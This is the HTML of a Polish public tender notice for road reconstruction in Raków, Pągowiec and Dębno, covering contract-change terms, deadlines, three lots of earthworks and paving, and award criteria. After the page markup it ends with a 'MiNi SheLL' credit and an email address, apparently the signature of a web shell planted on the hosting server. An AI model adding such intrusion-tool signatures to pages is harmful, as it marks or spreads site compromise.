<b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Na podstawie art. 144 ustawy Pzp Zamawiający dopuszcza zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy na poniższych warunkach. 1) W zakresie wynagrodzenia: a) w przypadku zmiany stawki podatku VAT, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego, w trakcie trwania umowy; b) zgodnie z zapisem § 3 pkt 2; c) zgodnie z art. 144 ust. 1 pkt 6) ustawy ,,Prawo zamówień publicznych" (łączna wartość zmian jest mniejsza od 15% wartości zamówienia określonej pierwotnie w umowie. 2) w zakresie terminu realizacji zamówienia: a) w przypadku wykonywania innych wcześniej nieprzewidzianych robót w strefie przekazanego placu budowy, Wykonawca jest upoważniony do występowania o wydłużenie okresu na realizację zadania o okres wprowadzonych zakłóceń wraz ze skutkami z tego wynikłymi. Zapis dotyczy również wypadków drogowych powstałych w strefie robót; b) w przypadku wystąpienia podobnych robót, nie wyszczególnionych w Przedmiarze Robót, jak również wykonywania koniecznych rozwiązań zamiennych w stosunku do przedmiaru robót, jeżeli będzie potrzebny czas na ich wykonanie lub zmianę wynagrodzenia na warunkach określonych w Umowie, jeśli dotyczy; c) w przypadku wystąpienia siły wyższej, tj.: działania i zamieszki wojenne, ataki terrorystyczne, klęski żywiołowe spowodowane przez burze, huragany, tajfuny, trzęsienia ziemi, wybuchy wulkanów, ekonomiczne następstwa globalnego kryzysu finansowego i inne, uniemożliwiającej wykonanie zamówienia w terminie umownym lub powodującej zmianę zakresu robót; d) w przypadku wystąpienia niekorzystnych warunków atmosferycznych, nie pozwalających na prowadzenie prac oraz uniemożliwiających zapewnienie odpowiedniej jakości wykonywanych robót, tj.: ciągłe opady atmosferyczne, niska lub wysoka temperatura powietrza, potwierdzonych przez Instytut Meteorologii i Gospodarki Wodnej; e) w przypadku braku dostępu Wykonawcy do całego terenu budowy spowodowanego w szczególności protestami mieszkańców lub sytuacji blokowania przez nich drogi; f) z powodu zaistnienia omyłki pisarskiej lub rachunkowej; g) z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, które zaakceptuje na piśmie Zamawiający; h) jeżeli wystąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu zamówienia lub świadczenia jednej lub obu Stron Umowy; i) powstania rozbieżności lub niejasności w rozumieniu pojęć lub sformułowań użytych w Umowie, których nie będzie można usunąć w inny sposób, a zmiana treści Umowy będzie umożliwiać usunięcie rozbieżności lub niejasności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony; j) w przypadku wystąpienia przeszkód w gruncie, w tym: niewybuchów, wykopaliska, niezinwentaryzowane sieci, przeszkody geologiczne, a także w innych przypadkach wymienionych w art. 144 ustawy Prawo zamówień publicznych. 2. Zmiany Umowy wymagają zgody obu Stron z zachowaniem formy pisemnej pod rygorem nieważności o ile zapisy poszczególnych paragrafów umowy nie stanowią inaczej.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-10-28</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>1.	Przebudowa ul. Klasztornej w Rakowie;</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>- odtworzenie trasy i punktów wysokościowych w terenie równinnym,- usunięcie warstwy urodzajnej humusu o średniej grubości 15cm. Strona lewa,- usunięcie warstwy urodzajnej humusu o średniej grubości 15cm. Strona prawa, - rozebranie powierzchni utwardzonych strona lewa (chodnik, zjazdy) z elementów betonowych wraz z ewentualną podbudową. Wliczono przylegające obrzeża w powierzchnię rozbiórki. Materiał z rozbiórki do odwozu lub utylizacji,	- rozebranie powierzchni utwardzonych strona prawa (chodnik, zjazdy) z elementów betonowych wraz z ewentualną podbudową. Wliczono przylegające obrzeża w powierzchnię rozbiórki. Materiał z rozbiórki do odwozu lub utylizacji,	- rozebranie konstrukcji jezdni (szerokości powyżej 6.0m) (nawierzchnia bitumiczna, podbudowy) z uzupełnieniem gruntem nasypowym pod przyszłychodnik/pobocze lub wyrównanie do poziomu terenu istn. Materiał z rozbiórki do odwozu lub utylizacji,	- likwidacja pionowych znaków drogowych - słupka + fundamentu.,	- likwidacja pionowych znaków drogowych - tarcz, tabliczek w ilości 3,00 szt,- rozebranie krawężników betonowych wraz z ławą betonową. Materiał z rozbiórki do odwozu lub utylizacji,	- korytowanie strona lewa, na głębokość 10 cm (po uprzednim odhumusowaniu) pod chodniki, zjazdy, z transportem urobku na odkład w gr. kat. I-V Wykonawca zapewni miejsce składowania własnym staraniem i na własny koszt,	- korytowanie strona prawa na głębokość 10 cm (po uprzednim odhumusowaniu) pod chodniki, zjazdy, z transportem urobku na odkład w gr. kat. I-V. Wykonawca zapewni miejsce składowania własnym staraniem i na własny koszt,	- profilowanie, zagęszczenie podłoża pod konstrukcje jezdni, chodników, zjazdów. Strona lewa,	- profilowanie, zagęszczenie podłoża pod konstrukcje jezdni, chodników, zjazdów. Strona prawa,	- w-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznie 0/31,5mm , gr. w-wy 15cm. Pod chodniki, zjazdy. Strona lewa,	- w-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznie 0/31,5mm , gr. w-wy 15cm. Pod chodniki, zjazdy. Strona prawa,	- frezowanie nawierzchni wyrównawcze na średnią głębokość 4cm,	- oczyszczenie, skropienie emulsją asfaltową nawierzchni po frezowaniu,- warstwa wyrównawcza z betonu asfaltowego AC16W gr. w-wy 6cm, transport mieszanki samochodami samowyład.,- warstwa ścieralna konstrukcji nawierzchni z betonu asfaltowego AC11S, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład.,	- oznakowanie poziome jezdni materiałami grubowarstwowymi,	- ustawienie słupków z rur stalowych min. fi60 dla znaków drogowych wraz z fundamentem,- zakup, dostawa, przymocowanie tarcz znaków drogowych odblaskowych do słupków - typ 2,	- ściek przykrawężnikowy z kostki betonowej, szerokość ścieku 20cm, wykonywany na ławie betonowej 20cm,- krawężniki betonowe wystające lub obniżone o wymiarach 15x30 cm z wykonaniem ławy z betonu C12/15 z oporem po uprzednim korytowaniu na odpowiednią głębokość,	- obrzeża strona lewa (chodnik), betonowe o wymiarach 30x8 cm na podsypce cementowo - piaskowej, na ławie betonowej. Beton C12/15,	- obrzeża strona lewa (zjazdy), betonowe o wymiarach 30x8 cm na podsypce cementowo - piaskowej, na ławie betonowej. Beton C12/15,	- obrzeża strona prawa (chodnik), betonowe o wymiarach 30x8 cm na podsypce cementowo - piaskowej, na ławie betonowej. Beton C12/15,	- obrzeża strona prawa (zjazdy), betonowe o wymiarach 30x8 cm na podsypce cementowo - piaskowej, na ławie betonowej. Beton C12/15,	- chodniki, z kostki brukowej betonowej grubości 7 cm kolor żółty (oliwka), postarzana, nasiąkliwość wodą < 6%, grubość 7 cm, długość 22 cm, szerokość 16 cm układane na podsypce cementowo- piaskowej gr.3cm. Strona lewa chodnika,	- chodniki, z płyt ostrzegawczych dla osób niewidzących (przed przejściami dla pieszych) układane na podsypce cem- piaskowej gr.3cm. Strona lewa chodnika. Szerokość pasa płyt: 0.3m, dł. 4.2m,	- chodniki, z kostki brukowej betonowej grubości 7 cm kolor żółty (oliwka), postarzana, nasiąkliwość wodą < 6%, grubość 7 cm, długość 22 cm, szerokość 16 cm układane na podsypce cementowo- piaskowej gr.3cm. Strona prawa chodnika,	- chodniki, z płyt ostrzegawczych dla osób niewidzących (przed przejściami dla pieszych) układane na podsypce cem- piaskowej gr.3cm. Strona prawa chodnika. Szerokość pasa płyt: 0.3m, dł. 4.2m,	- zjazdy i dojścia z kostki brukowej betonowej grubości 7 cm kolor czerwona, postarzana, nasiąkliwość wodą < 6%, grubość 7 cm, długość 22 cm, szerokość 16 cm układane na podsypce cementowo- piaskowej gr.3cm. Strona lewa,	- zjazdy i dojścia z kostki brukowej betonowej grubości 7 cm kolor czerwona, postarzana, nasiąkliwość wodą < 6%, grubość 7 cm, długość 22 cm, szerokość 16 cm układane na podsypce cementowo- piaskowej gr.3cm. Strona prawa,	- regulacja pionowa pokryw studzienek kanalizacyjnych, telekomunikacyjnych, wpustów deszczowych,	- regulacja pionowa zasuw wodnych,	- zabezpieczenie otworu pomiędzy przepustem a wpustem deszczowym, za pomocą pokrywy betonowej. Wymiary płyty min. 1.5m x 1.1mSzczegółowy opis przedmiotu zamówienia oraz jego zakres stanowią: a) kosztorysy ofertowe - załączniki nr 2, b) przedmiary robót - rozdział II, c) szczegółowe specyfikacje techniczne - rozdział IV. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45233000-9, 45111000-8, 45112000-5, 45231000-5, 45233290-8<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>2.	Przebudowa drogi w Pągowcu</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>- karczowanie drzew, krzaków, pni drzew, gałęzi w skrajni drogi wraz z utylizacją materiału po karczowaniu,- koryto wykonywane mechanicznie jednostronnie pod konstrukcję jezdni o szer. 0,5m-1,0m. Głębokość koryta 30cm. Pozyskany materiał wbudować w pobocza lub wywieść,- w-wa podbudowy pomocniczej z rumoszu skalnego stabilizowanego mechanicznie, gr. w-wy 10cm. Podbudowa pod konstrukcję jezdni,- w-wa podbudowy pomocniczej z rumoszu skalnego stabilizowanego mechanicznie, gr. w-wy 10cm. Podbudowa pod konstrukcję jezdni,- oczyszczenie i skropienie emulsją asfaltową,- warstwa wiążąca z betonu asfaltowego AC16W gr. w-wy 6cm, transport mieszanki samochodami samowyład,- warstwa ścieralna z betonu asfaltowego AC11S, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład.Szczegółowy opis przedmiotu zamówienia oraz jego zakres stanowią: a) kosztorysy ofertowe - załączniki nr 2, b) przedmiary robót - rozdział II, c) szczegółowe specyfikacje techniczne - rozdział IV- pobocza i zjazdy z krusyzwa łamanego o uziarnieniu 0/31,5 o szer. 0,75m. wraz z wyrównaniem gruntem. Grubość warstwy kruszywa: 10cm,- oznakowanie poziome jezdni.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45233000-9, 45111000-8, 45112000-5, 45233290-8<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>3.	Przebudowa drogi we miejscowości Dębno;</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odcinek od drogi wojewódzkiej DW 764- Karczowanie drzew, krzaków, pni drzew, gałęzi w skrajni drogi wraz z utylizacją materiału po karczowaniu,- Rozebranie powierzchni utwardzonych (płyty chodnikowe betonowe, beton wylewany) wraz z ewentualną podbudową i ewentualnym korytowaniem na sumaryczną głębokość 30cm. Materiał z rozbiórki do odwozu lub utylizacji,- Rozebranie powierzchni utwardzonych (nawierzchnia asfaltowa) wraz z ewentualną podbudową i ewentualnym korytowaniem na sumaryczną głębokość 50cm. Materiał z rozbiórki do odwozu lub utylizacji,- Rozebranie powierzchni utwardzonych (nawierzchnia brukowa jezdni) wraz z ewentualną podbudową i ewentualnym korytowaniem na sumaryczną głębokość 50cm. Materiał z rozbiórki do odwozu lub utylizacji,- Rozebranie krawężników betonowych wraz z ławą betonową. Materiał z rozbiórki do odwozu lub utylizacji,- Wykonanie nasypów mechanicznie z gruntu pozyskanego przez Wykonawcę, spełniającego warunki określone w SST wraz z transportem, formowaniem i zagęszczaniem,- Koryto wykonywane mechanicznie na szerokości 2,3m pod chodnik. Głębokość koryta średnio 20 cm. Pozyskany materiał wbudować w pobocza lub wywieść,- Koryto wykonywane mechanicznie jednostronnie pod konstrukcję jezdni o szer. 0,7m. Głębokość koryta 30cm. Pozyskany materiał wbudować w pobocza lub wywieść,- Koryto wykonywane mechanicznie jednostronnie pod konstrukcję jezdni o szer. 1,0m. Głębokość koryta 40cm. Pozyskany materiał wbudować w pobocza lub wywieść,- W-wa podbudowy pomocniczej z rumoszu skalnego stabilizowanego mechanicznie, gr. w-wy 10cm. Podbudowa pod konstrukcję jezdni,- W-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/63 zaklinowanego kruszywem 0/31,5mm, gr. w-wy 20cm. Pod chodniki, zjazdy, konstrukcję jezdni,- Oczyszczenie i skropienie emulsją asfaltową,- Warstwa wiążąca z betonu asfaltowego AC16W gr. w-wy 5cm, transport mieszanki samochodami samowyład.,- Warstwa ścieralna z betonu asfaltowego AC11S, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład.,- Krawężniki betonowe wystające lub obniżone o wymiarach 15x30 cm z wykonaniem ławy z betonu C12/15 z oporem na wysokość połowy krawężnika,- Chodniki i zjazdy z kostki brukowej betonowej grubości 8 cm, układane na podsypce cementowo-piaskowej 1:4 gr.3cm.,- Obrzeża betonowe o wymiarach 30x8 cm na podsypce cementowo - piaskowej, na ławie z betonu C12/15 z oporem,- Wykonanie ścieku przykrawężnikowego z kostki brukowej betonowej o gr. 8cm na ławie z betonu C12/15. Szerokość ścieku 20cm,- Wykonanie ścieków podchodnikowych z krawężników betonowych 15x30 na ławie z betonu C12/15, płyt chodnikowych 50x50x7 i częściowym uzupełniem z betonu C12/15,- Oznakowanie poziome jezdni,- Ustawienie słupków z rur stalowych dla znaków drogowych wraz z wykonaniem wykopu, fundamentu i zasypaniem dołów z ubiciem warstwami,- Tablice znaków drogowych kat. A,B,C,D,T mocowane do słupków stalowych,- Pobocza i zjazdy z kruszywa łamanego o uziarnieniu 0/31,5 o szer. 0,75m. wraz z wyrównaniem gruntem. Grubość warstwy kruszywa: 10cm,- Regulacja pionowa studzienek kanalizacyjnych,- Regulacja pionowa zasuw i hydrantów sieci wodociągowej,- Przebudowa hydrantów nadziemnych na podziemne. Hydranty zlokalizowane w chodniku.Odcinek od drogi powiatowej 0349T- Geodezyjne wytyczenie granicy pasa drogowego w terenie,- Karczowanie drzew, krzaków, pni drzew, gałęzi w skrajni drogi wraz z utylizacją materiału po karczowaniu,- Wykonanie robót ziemnych polegających na mechanicznym profilowaniu skarpy z transportem urobku na nasyp lub wbudowanie z pobocza w gr. kat. I-V. pozyskany materiał do wbudowania w pobocza, nadmiar mas ziemnych do odwozu poza teren budowy,- Remont przepustów rur betonowych o śr. 400mm wraz z robotami ziemnymi, wykonaniem ławy z kruszywa 0/31,5 gr. min. 15cm oraz obsypką z piasku,- Remont ścianki czołowej przepustu dla rur betonowych o śr. 400mm. Rozbiórka istniejącej ścianki i jej ponowy montaż do wykonaniu remontu przepustu wraz z robotami ziemnymi, wykonaniem ławy z kruszywa 0/31,5 gr. min. 15cm oraz obsypką z piasku,- Ścięcie, profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni jezdni i poboczy, wykonywane mechanicznie przy użyciu równiarki samojezdnej i walca statycznego,- W-wa podbudowy pomocniczej z rumoszu skalnego stabilizowanego mechanicznie, gr. w-wy 15cm. Podbudowa pod konstrukcję jezdni,- W-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/63 zaklinowanego kruszywem 0/31,5mm, gr. w-wy 20cm. Pod chodniki, zjazdy, konstrukcję jezdni,- Warstwa wiążąca z betonu asfaltowego AC16W gr. w-wy 5cm, transport mieszanki samochodami samowyład,- Warstwa ścieralna z betonu asfaltowego AC11S, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład.,- Pobocza i zjazdy z kruszywa łamanego o uziarnieniu 0/31,5 o szer. 0,75m. wraz z wyrównaniem gruntem. Grubość warstwy kruszywa: 10cm,- Odmulenie rowu przydrożnego. Średnia głębokość odmulenia 40cm. Materiał wbudować w pobocza lub wywieść,- Ustawienie słupków z rur stalowych dla znaków drogowych wraz z wykonaniem wykopu, fundamentu i zasypaniem dołów z ubiciem warstwami,- Tablice znaków drogowych kat. A i D mocowane do słupków stalowychSzczegółowy opis przedmiotu zamówienia oraz jego zakres stanowią: a) kosztorysy ofertowe - załączniki nr 2, b) przedmiary robót - rozdział II, c) szczegółowe specyfikacje techniczne - rozdział IV<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45233000-9, 45111000-8, 45112000-5, 45231000-5, 45233290-8<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com